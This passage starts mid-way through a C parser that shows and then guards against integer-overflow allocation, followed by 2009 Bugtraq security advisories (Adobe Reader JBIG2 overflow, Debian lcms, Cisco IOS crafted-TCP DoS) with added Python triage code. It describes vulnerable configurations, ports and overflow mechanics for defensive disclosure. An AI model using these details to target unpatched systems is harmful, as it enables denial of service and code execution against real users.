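           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* What "count * elem_size" becomes when the product is kept in 32 bits.
 * A count of 0x40000001 with 4-byte elements yields 4, so an unchecked
 * parser would allocate 4 bytes for a table it believes has a billion
 * entries. Shown only to make the wrap visible; parse_table never
 * multiplies an unvalidated count. */
uint32_t alloc_size_32bit(uint32_t count, uint32_t elem_size)
{
    return count * elem_size;   /* unsigned arithmetic wraps modulo 2^32 */
}

/* Constructed layout: 4-byte big-endian count, then `count` 4-byte
 * big-endian values. The count is validated against a policy cap and
 * against the bytes actually present before anything is allocated, and
 * the fill loop is bounded by that same validated count. */
enum parse_status parse_table(const uint8_t *buf, size_t len, struct table *out)
{
    out->count  = 0;
    out->values = NULL;

    if (len < 4)
        return PARSE_TRUNCATED;

    uint32_t count     = read_be32(buf);
    size_t   remaining = len - 4;

    if (count > MAX_TABLE_ENTRIES)
        return PARSE_TOO_LARGE;
    /* Divide instead of multiplying: no intermediate value can overflow. */
    if (count > remaining / 4)
        return PARSE_TRUNCATED;
    if (count == 0)
        return PARSE_OK;

    /* calloc rejects a count * size product that does not fit in size_t. */
    uint32_t *values = calloc(count, sizeof *values);
    if (values == NULL)
        return PARSE_NOMEM;

    for (uint32_t i = 0; i < count; i++)
        values[i] = read_be32(buf + 4 + (size_t)i * 4);

    out->count  = count;
    out->values = values;
    return PARSE_OK;
}

void table_free(struct table *t)
{
    free(t->values);
    t->values = NULL;
    t->count  = 0;
}

/* Constructed sample inputs (not taken from any real file). */
const uint8_t SAMPLE_VALID[] = { 0,0,0,3,  0,0,0,1,  0,0,0,2,  0,0,0,3 };
const uint8_t SAMPLE_SHORT[] = { 0,0,0,5,  0,0,0,1,  0,0,0,2 };   /* claims 5, carries 2 */
const uint8_t SAMPLE_HUGE[]  = { 0x40,0,0,1,  0,0,0,1 };          /* count 0x40000001 */

int main(void)
{
    struct table t;
    printf("valid: %d\n", (int)parse_table(SAMPLE_VALID, sizeof SAMPLE_VALID, &t));
    table_free(&t);
    printf("short: %d\n", (int)parse_table(SAMPLE_SHORT, sizeof SAMPLE_SHORT, &t));
    printf("huge:  %d\n", (int)parse_table(SAMPLE_HUGE, sizeof SAMPLE_HUGE, &t));
    printf("0x40000001 * 4 in 32 bits = %u\n",
           (unsigned)alloc_size_32bit(0x40000001u, 4u));
    return 0;
}
```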

From - Wed Mar 25 12:22:49 2009
Date: Wed, 25 Mar 2009 10:22:05 +0100
To: bugtraq@securityfocus.com
Subject: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary Buffer Overflow
From: Secunia Research <remove-vuln@secunia.com>

=====================================================================
                     Secunia Research 25/03/2009

      - Adobe Reader JBIG2 Symbol Dictionary Buffer Overflow -

=====================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================
1) Affected Software

* Adobe Reader versions 8.1.3 and 9.0.0

NOTE: Other versions may also be affected.

=====================================================================
2) Severity

Rating: Highly critical 
Impact: System access
Where:  Remote

=====================================================================
3) Vendor's Description of Software

"Adobe Reader software is the global standard for electronic document 
sharing. It is the only PDF file viewer that can open and interact 
with all PDF documents."

Product Link:
http://www.adobe.com/products/reader/

=====================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Adobe Reader, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in the processing
of JBIG2 streams. This can be exploited to cause a heap-based buffer 
overflow via a specially crafted PDF file containing a malformed 
JBIG2 symbol dictionary segment.

Successful exploitation may allow execution of arbitrary code.

=====================================================================
5) Solution

Update to version 7.1.1, 8.1.4, or 9.1.

=====================================================================
6) Time Table

06/03/2009 - Vendor notified.
07/03/2009 - Vendor response.
25/03/2009 - Public disclosure.

=====================================================================
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

=====================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0193 for the vulnerability.

=====================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-14/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Wed Mar 25 12:32:49 2009
Date: Wed, 25 Mar 2009 22:32:18 +1100 (EST)
From: white@debian.org (Steffen Joeris)
Subject: [SECURITY] [DSA 1745-2] New lcms packages fix regression
To: bugtraq@securityfocus.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1745-2                  security@debian.org
http://www.debian.org/security/                      Steffen Joeris
March 25, 2009                    http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : lcms
Vulnerability  : several vulnerabilities
Problem type   : local (remote)
Debian-specific: no
CVE Ids        : CVE-2009-0581 CVE-2009-0723 CVE-2009-0733


This update fixes a possible regression introduced in DSA-1745-1 and
also enhances the security patch. For reference the original advisory
text is below.

Several security issues have been discovered in lcms, a color management
library. The Common Vulnerabilities and Exposures project identifies
the following problems:


CVE-2009-0581

Chris Evans discovered that lcms is affected by a memory leak, which
could result in a denial of service via specially crafted image files.

CVE-2009-0723

Chris Evans discovered that lcms is prone to several integer overflows
via specially crafted image files, which could lead to the execution of
arbitrary code.

CVE-2009-0733

Chris Evans discovered the lack of upper-bounds check on sizes leading
to a buffer overflow, which could be used to execute arbitrary code.


For the stable distribution (lenny), these problems have been fixed in
version 1.17.dfsg-1+lenny2.

For the oldstable distribution (etch), these problems have been fixed
in version 1.15-1.1+etch3.

For the testing distribution (squeeze) and the unstable distribution
(sid), these problems will be fixed soon.


We recommend that you upgrade your lcms packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS Software Multiple Features Crafted TCP Sequence Vulnerability
Date: Wed, 25 Mar 2009 17:00:00 +0100
Message-id: <200903251705.tcp@psirt.cisco.com>
Reply-To: psirt@cisco.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco IOS Software Multiple Features Crafted
TCP Sequence Vulnerability

Advisory ID: cisco-sa-20090325-tcp

http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

Revision 1.0

For Public Release 2009 March 25 1600 UTC (GMT)

- ---------------------------------------------------------------------

Summary
======
Cisco IOS Software contains a vulnerability in multiple features
that could allow an attacker to cause a denial of service (DoS)
condition on the affected device. A sequence of specially crafted TCP
packets can cause the vulnerable device to reload.

Cisco has released free software updates that address this
vulnerability.

Several mitigation strategies are outlined in the workarounds section
of this advisory.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.

http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml

Individual publication links are listed below:

  * Cisco IOS cTCP Denial of Service Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

  * Cisco IOS Software Multiple Features IP Sockets Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml

  * Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

  * Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

  * Cisco IOS Software Session Initiation Protocol Denial of Service
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml

  * Cisco IOS Software Multiple Features Crafted TCP Sequence
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

  * Cisco IOS Software Multiple Features Crafted UDP Packet
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml

  * Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

Affected Products
================
Vulnerable Products
+------------------

Devices running affected versions of Cisco IOS Software and Cisco IOS
XE Software are affected when configured to use any of the following
features within Cisco IOS:

  * Airline Product Set (ALPS)
  * Serial Tunnel Code (STUN) and Block Serial Tunnel Code (BSTUN)
  * Native Client Interface Architecture support (NCIA)
  * Data-link switching (DLSw)
  * Remote Source-Route Bridging (RSRB)
  * Point to Point Tunneling Protocol (PPTP)
  * X.25 for Record Boundary Preservation (RBP)
  * X.25 over TCP (XOT)
  * X.25 Routing

Information on how to determine whether an affected feature is
enabled on a device is provided in the Details section of this
advisory.

To determine the Cisco IOS Software release that is running on a
Cisco product, administrators can log in to the device and issue the
"show version" command to display the system banner. The system
banner confirms that the device is running Cisco IOS Software by
displaying text similar to "Cisco Internetwork Operating System
Software" or "Cisco IOS Software." The image name displays in
parentheses, followed by "Version" and the Cisco IOS Software release
name. Other Cisco devices do not have the "show version" command or
may provide different output.

The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.3(26) with an installed image name of
C2500-IS-L:

    Router#show version
    Cisco Internetwork Operating System Software
    IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2008 by cisco Systems, Inc.
    Compiled Mon 17-Mar-08 14:39 by dchih

    <output truncated>

The following example shows a product that is running Cisco IOS
Software Release 12.4(20)T with an image name of
C1841-ADVENTERPRISEK9-M:

    Router#show version
    Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2008 by Cisco Systems, Inc.
    Compiled Thu 10-Jul-08 20:25 by prod_rel_team

    <output truncated>

Additional information about Cisco IOS Software release naming
conventions is available in "White Paper: Cisco IOS Reference Guide"
at the following link: http://www.cisco.com/warp/public/620/1.html .
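
The banner check described above, written as a parser for inventory triage. This is an added example, not part of the Cisco advisory; the function name, the IOS XR sample line and the rule that derives the release train from the version string (for looking up the matching row of the fix table) are assumptions.

```python
import re

# Constructed inputs: the two banners shown in the advisory, plus an IOS XR
# banner (a product the advisory lists as not vulnerable) that must not be
# mistaken for Cisco IOS Software.
BANNER_CLASSIC = """\
    Router#show version
    Cisco Internetwork Operating System Software
    IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
"""
BANNER_NEW = """\
    Router#show version
    Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
"""
BANNER_XR = "Cisco IOS XR Software, Version 3.8.0[00]\n"  # constructed sample

# Matches both banner styles: "IOS (tm) <platform> Software (<image>), Version <v>,"
# and "Cisco IOS Software, <platform> Software (<image>), Version <v>,".
BANNER_RE = re.compile(
    r"^\s*(?:IOS \(tm\)|Cisco IOS Software,)\s+(?P<platform>.+?) Software "
    r"\((?P<image>[^)]+)\), Version (?P<version>[^,\s]+)",
    re.M,
)

# Assumed naming convention: major.minor(maintenance[interim])TRAIN[rebuild],
# e.g. 12.4(20)T belongs to train "12.4T" and 12.3(26) to mainline "12.3".
VERSION_RE = re.compile(
    r"(?P<major>\d+)\.(?P<minor>\d+)\((?P<maint>\d+)(?P<interim>[a-z]?)\)"
    r"(?P<train>[A-Z]*)(?P<rebuild>\w*)"
)


def parse_show_version(output):
    """Return platform, image, version and release train, or None when the
    text carries no recognisable Cisco IOS Software banner."""
    banner = BANNER_RE.search(output)
    if banner is None:
        return None  # other devices "may provide different output"
    info = banner.groupdict()
    parts = VERSION_RE.fullmatch(info["version"])
    if parts is None:
        # Banner recognised but version string in an unexpected shape:
        # keep the raw value so a human can review it.
        info["train"] = None
        info["maintenance"] = None
        return info
    info["train"] = "{major}.{minor}{train}".format(**parts.groupdict())
    info["maintenance"] = int(parts["maint"])
    return info


if __name__ == "__main__":
    for sample in (BANNER_CLASSIC, BANNER_NEW, BANNER_XR):
        print(parse_show_version(sample))
```
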

Products Confirmed Not Vulnerable
+--------------------------------

The following product and feature have been confirmed not vulnerable:

  * Cisco IOS XR Software
  * BGP is not affected

No other Cisco products or features configured within Cisco IOS
Software are currently known to be affected by this vulnerability.

Details
======
Completion of the 3-way handshake to the associated TCP port number(s)
of any of the features outlined below is required in order for
the vulnerability to be successfully exploited.

Airline Product Set (ALPS)
+-------------------------

Devices configured for ALPS are vulnerable. The default TCP listening
ports for ALPS are 350 and 10000. The following example shows a
vulnerable ALPS configuration:

    alps local-peer <ip address>

Further information about ALPS is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.2 - Configuring
the Airline Product Set" at the following link
http://www.cisco.com/en/US/docs/ios/12_2/ibm/configuration/guide/bcfalps_ps1835_TSD_Products_Configuration_Guide_Chapter.html

Serial Tunnel Code (STUN) and Block Serial Tunneling (BSTUN)
+-----------------------------------------------------------

Devices configured for either STUN or BSTUN are vulnerable. The
default listening TCP ports for STUN are 1990, 1991, 1992 and 1994. The
default listening TCP ports for BSTUN are 1963, 1976, 1977, 1978 and
1979. The following example shows a vulnerable STUN configuration:

    interface serial 0/0/0
    encapsulation stun

The following example shows a vulnerable BSTUN configuration:

    interface serial 0/0/0
    encapsulation bstun

Further information about STUN and BSTUN is available in "Cisco IOS
Bridging and IBM Networking Configuration Guide, Release 12.2 -
Configuring Serial Tunnel and Block Serial Tunnel" at the following
link 
http://www.cisco.com/en/US/docs/ios/12_2/ibm/configuration/guide/bcfstun_ps1835_TSD_Products_Configuration_Guide_Chapter.html

Native Client Interface Architecture support (NCIA)
+--------------------------------------------------

Devices configured for NCIA are vulnerable, because of the underlying
transport they will use. The default listening TCP ports will be
dependent on the protocol used with NCIA, such as RSRB or DLSw. The
following example shows a vulnerable configuration:

    ncia server 1 10.66.91.138 0000.1111.2222 2222.2222.2222 1

Further information about NCIA is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.4 - Configuring
NCIA Client/Server" at the following link 
http://www.cisco.com/en/US/docs/ios/bridging/configuration/guide/br_ncia_client_svr_ps6350_TSD_Products_Configuration_Guide_Chapter.html

Data-link switching (DLSw)
+-------------------------

Devices configured for DLSw are vulnerable. The default listening TCP
ports for DLSw are 2065, 2067, 1981, 1982 and 1983. The following
example shows a vulnerable configuration:

    dlsw local-peer peer-id <ip address>

Devices configured with either FST Encapsulation or Direct
Encapsulation are still vulnerable as the affected TCP ports are
opened by the "dlsw local-peer peer-id ip address" command.

Further information about DLSw is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.4 - Configuring
Data-Link Switching Plus" at the following link 
http://www.cisco.com/en/US/docs/ios/bridging/configuration/guide/br_dlsw_plus_ps6350_TSD_Products_Configuration_Guide_Chapter.html

Remote Source-Route Bridging (RSRB)
+----------------------------------

Devices configured for RSRB Using IP Encapsulation over a TCP
connection are vulnerable. The default listening TCP ports for RSRB
are 1996, 1987, 1988 and 1989. The following example shows a
vulnerable configuration:

    source-bridge ring-group 10
    source-bridge remote-peer 10 tcp <ip address>

Devices configured with either RSRB Using Direct Encapsulation or
RSRB Using IP Encapsulation over an FST Connection are not affected.

Further information about RSRB is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.2 - Configuring
Remote Source-Route Bridging" at the following link 
http://www.cisco.com/en/US/docs/ios/12_2/ibm/configuration/guide/bcfrsrb_ps1835_TSD_Products_Configuration_Guide_Chapter.html

Point to Point Tunneling Protocol (PPTP)
+---------------------------------------

Devices configured for PPTP are vulnerable. The default listening TCP
port for PPTP is 1723. The following examples show a vulnerable
configuration:

    vpdn enable
    !
    vpdn-group pptp
    ! Default PPTP VPDN group
     accept-dialin
      protocol pptp
      virtual-template 1

Or

    vpdn enable
    !
    vpdn-group L2_Tunneling
    ! Default L2TP VPDN group
    ! Default PPTP VPDN group
     accept-dialin
      protocol any
      virtual-template 1

Further information about PPTP is available in "Cisco IOS VPDN
Configuration Guide, Release 12.4 - Configuring Client-Initiated
Dial-In VPDN Tunneling" at the following link 
http://www.cisco.com/en/US/docs/ios/vpdn/configuration/guide/client_init_dial-in_ps6350_TSD_Products_Configuration_Guide_Chapter.html#wp1105140

X.25 Record Boundary Preservation (RBP)
+--------------------------------------

Devices configured for RBP are vulnerable. The listening TCP port is
configured with the "local port port_number" CLI command, as shown in
the next examples. The following examples show vulnerable
configurations. The first leverages switched virtual circuits (SVC):

    interface Serial1/0
       x25 map rbp 1111 local port <port_number>

The second example leverages a permanent virtual circuit (PVC):

    interface Serial1/0
       x25 map pvc <pvc_number> rbp local port <port_number>

Further information about RBP is available in "Cisco IOS Wide-Area
Networking Configuration Guide, Release 12.4 - X.25 Record Boundary
Preservation for Data Communications Networks" at the following link
http://www.cisco.com/en/US/docs/ios/wan/configuration/guide/wan_x25_rbp_dcn_ps6350_TSD_Products_Configuration_Guide_Chapter.html

X.25 over TCP (XOT)
+------------------

Devices configured for XOT are vulnerable. The default listening TCP
port for XOT is 1998. The following example shows a vulnerable
configuration.

    xot access-group 1

    and a corresponding access-list 1.

Further information about XOT is available in "Cisco IOS Wide-Area
Networking Configuration Guide, Release 12.4 - X.25 over TCP
Profiles" at the following link 
http://www.cisco.com/en/US/docs/ios/wan/configuration/guide/wan_x25otcp_pro_ps6350_TSD_Products_Configuration_Guide_Chapter.html

X25 Routing
+----------

Devices configured with X25 are vulnerable. The default listening TCP
port for X25 Routing is 1998. The following example shows a
vulnerable configuration.

    x25 routing

Further information about X25 is available in "Cisco IOS Wide-Area
Networking Configuration Guide, Release 12.4 - Configuring X.25 and
LAPB" at the following link 
http://www.cisco.com/en/US/docs/ios/wan/configuration/guide/wan_cfg_x25_lapb_ps6350_TSD_Products_Configuration_Guide_Chapter.html

This vulnerability is documented in the following Cisco Bug ID:
CSCsr29468 and has been assigned the Common Vulnerabilities and 
Exposures (CVE) identifier CVE-2009-0629.
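
The per-feature configuration checks in the Details section, gathered into one audit over a saved running-config. This is an added example, not part of the Cisco advisory; the function names and the sample configuration are constructed, and treating "vpdn enable" as a precondition for PPTP is an assumption drawn from the advisory's two PPTP examples.

```python
import re

# (feature, config-line pattern, default TCP listening ports) as listed in the
# advisory's Details section. An empty tuple means no fixed default is given
# (NCIA inherits the ports of its underlying transport, RSRB or DLSw).
RULES = [
    ("ALPS", r"alps local-peer \S+", (350, 10000)),
    ("STUN", r"encapsulation stun", (1990, 1991, 1992, 1994)),
    ("BSTUN", r"encapsulation bstun", (1963, 1976, 1977, 1978, 1979)),
    ("NCIA", r"ncia server \d+", ()),
    ("DLSw", r"dlsw local-peer peer-id \S+", (2065, 2067, 1981, 1982, 1983)),
    # Only the TCP form of RSRB is affected, not direct or FST encapsulation.
    ("RSRB", r"source-bridge remote-peer \d+ tcp \S+", (1996, 1987, 1988, 1989)),
    ("XOT", r"xot access-group \S+", (1998,)),
    ("X.25 routing", r"x25 routing", (1998,)),
]
# RBP has no default port: it listens on whatever "local port" names.
RBP_RE = re.compile(r"x25 map (?:pvc \d+ )?rbp\b.*?\blocal port (\d+)")

# Constructed running-config used to exercise the audit.
SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
dlsw local-peer peer-id 192.0.2.1
!
source-bridge ring-group 10
source-bridge remote-peer 10 fst 192.0.2.2
!
vpdn enable
!
vpdn-group L2_Tunneling
 accept-dialin
  protocol any
  virtual-template 1
!
x25 routing
!
interface Serial1/0
 x25 map rbp 1111 local port 9999
!
"""


def audit_config(config_text):
    """Map each affected feature found in the config to its listening TCP
    ports and the configuration lines that enabled it."""
    found = {}

    def hit(feature, ports, line):
        entry = found.setdefault(feature, {"ports": set(), "lines": []})
        entry["ports"].update(ports)
        entry["lines"].append(line)

    vpdn_enabled, section, pptp_lines = False, "", []
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):
            continue  # blank lines and comments never change the section
        if not raw[0].isspace():
            section = line  # unindented line opens a new top-level section
        if line == "vpdn enable":
            vpdn_enabled = True
        if section.startswith("vpdn-group") and re.fullmatch(r"protocol (?:pptp|any)", line):
            pptp_lines.append(section + " / " + line)
        rbp = RBP_RE.search(line)
        if rbp:
            hit("RBP", (int(rbp.group(1)),), line)
        for feature, pattern, ports in RULES:
            if re.fullmatch(pattern + r"(?:\s.*)?", line):
                hit(feature, ports, line)
    if vpdn_enabled and pptp_lines:  # assumption: PPTP needs "vpdn enable"
        for line in pptp_lines:
            hit("PPTP", (1723,), line)
    return {f: {"ports": sorted(e["ports"]), "lines": e["lines"]} for f, e in found.items()}


def exposed_ports(findings):
    """Union of TCP ports to cover with infrastructure ACLs until the fix is
    installed. These are defaults plus explicitly configured RBP ports."""
    return sorted({p for entry in findings.values() for p in entry["ports"]})


if __name__ == "__main__":
    report = audit_config(SAMPLE_CONFIG)
    for feature, entry in report.items():
        print(feature, entry["ports"], entry["lines"])
    print("ports:", exposed_ports(report))
```

An NCIA finding reports no ports of its own, so read it together with the RSRB or DLSw finding for the same device.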

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

CSCsr29468: Cisco IOS Software Multiple Features Crafted TCP Sequence
            Vulnerability

CVSS Base Score - 7.8

 Access Vector           - Network
 Access Complexity       - Low
 Authentication          - None
 Confidentiality Impact  - None
 Integrity Impact        - None
 Availability Impact     - Complete

CVSS Temporal Score - 6.4

 Exploitability          - Functional
 Remediation Level       - Official-Fix
 Report Confidence       - Confirmed

Impact
=====
Successful exploitation of this vulnerability will cause the device
to reload. Repeated attempts to exploit this vulnerability could
result in a sustained DoS condition.

Software Versions and Fixes
==========================
When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Release" column of the
table.
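
The following is an added example, not part of the Cisco advisory or any
Cisco tool. It applies the "earlier than the First Fixed Release" rule to
a running release string and checks a configuration for the two vulnerable
lines shown earlier in this section. The per-branch reading of cells that
list several first fixed releases, the treatment of newer maintenance
releases as fixed, and the sample configuration are assumptions of this
example.

```python
import re
from typing import NamedTuple

# IOS release string: major.minor(maintenance)TRAIN[rebuild][letter],
# e.g. "12.2(33)SRB5a" -> 12.2, maintenance 33, train SRB, rebuild 5, suffix a.
_RELEASE = re.compile(r"^(\d+)\.(\d+)\((\d+)\)([A-Z]*)(\d*)([a-z]?)$")


class Release(NamedTuple):
    major: int
    minor: int
    maintenance: int
    train: str
    rebuild: int
    suffix: str

    @property
    def train_name(self) -> str:
        """Row label used in the table's first column, e.g. '12.2SRB'."""
        return f"{self.major}.{self.minor}{self.train}"


def parse_release(text: str) -> Release:
    m = _RELEASE.match(text.strip())
    if m is None:
        raise ValueError(f"unrecognised IOS release string: {text!r}")
    major, minor, maint, train, rebuild, suffix = m.groups()
    return Release(int(major), int(minor), int(maint), train,
                   int(rebuild or 0), suffix)


# "First Fixed Release" cells copied from five rows of the table below.
FIRST_FIXED = {
    "12.2SB": ["12.2(33)SB3", "12.2(28)SB13", "12.2(31)SB14"],
    "12.2SE": ["12.2(46)SE2", "12.2(50)SE", "12.2(44)SE5"],
    "12.2SGA": ["12.2(31)SGA9"],
    "12.2SRC": ["12.2(33)SRC3"],
    "12.2SXF": ["12.2(18)SXF16"],
}


def assess(running: str) -> str:
    """Return 'fixed', 'vulnerable' or 'unknown' for a running release."""
    rel = parse_release(running)
    cells = FIRST_FIXED.get(rel.train_name)
    if cells is None:
        return "unknown"  # row not copied into FIRST_FIXED; read the table
    fixed = [parse_release(c) for c in cells]
    # Assumption: several entries in one cell are per-maintenance branches,
    # so compare rebuild numbers only against the entry with the same
    # maintenance number.
    for f in fixed:
        if f.maintenance == rel.maintenance:
            at_or_after = (rel.rebuild, rel.suffix) >= (f.rebuild, f.suffix)
            return "fixed" if at_or_after else "vulnerable"
    # Assumption: a maintenance release newer than every listed fix carries
    # it; anything else has no fixed rebuild in its branch and is treated as
    # vulnerable (the conservative reading).
    if rel.maintenance > max(f.maintenance for f in fixed):
        return "fixed"
    return "vulnerable"


# Only the two features shown in this section; the advisory covers others.
_FEATURES = {
    "XOT": re.compile(r"^\s*xot access-group \d+", re.MULTILINE),
    "X25 routing": re.compile(r"^\s*x25 routing\b", re.MULTILINE),
}


def configured_features(running_config: str) -> list:
    """Names of the features above whose configuration line is present."""
    return [n for n, pat in _FEATURES.items() if pat.search(running_config)]


# Constructed running-config excerpt (hostname and addresses are made up).
SAMPLE_CONFIG = """\
hostname edge-rtr-01
x25 routing
xot access-group 1
access-list 1 permit 192.0.2.0 0.0.0.255
"""

if __name__ == "__main__":
    print("features:", configured_features(SAMPLE_CONFIG))
    for release in ("12.2(33)SB2", "12.2(28)SB13", "12.2(44)SE6",
                    "12.2(46)SE1", "12.2(18)SXF15", "12.4(22)T"):
        print(f"{release:16} {assess(release)}")
```

A result of "unknown" means the train's row was not copied into
FIRST_FIXED, not that the release is unaffected.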

+-------------------------------------------------------------------+
|   Major    |          Availability of Repaired Releases           |
|  Release   |                                                      |
|------------+------------------------------------------------------|
| Affected   |                             |                        |
| 12.0-Based | First Fixed Release         | Recommended Release    |
| Releases   |                             |                        |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                             |                        |
| 12.1-Based | First Fixed Release         | Recommended Release    |
| Releases   |                             |                        |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                             |                        |
| 12.2-Based | First Fixed Release         | Recommended Release    |
| Releases   |                             |                        |
|------------+-----------------------------+------------------------|
| 12.2       | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2B      | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2BC     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2BW     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2BX     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2BY     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2BZ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2CX     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2CY     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2CZ     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2DA     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2DD     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2DX     | Not Vulnerable              |                        |
|------------+-----------------------------+------------------------|
| 12.2EW     | Vulnerable; first fixed in  | 12.2(31)SGA9           |
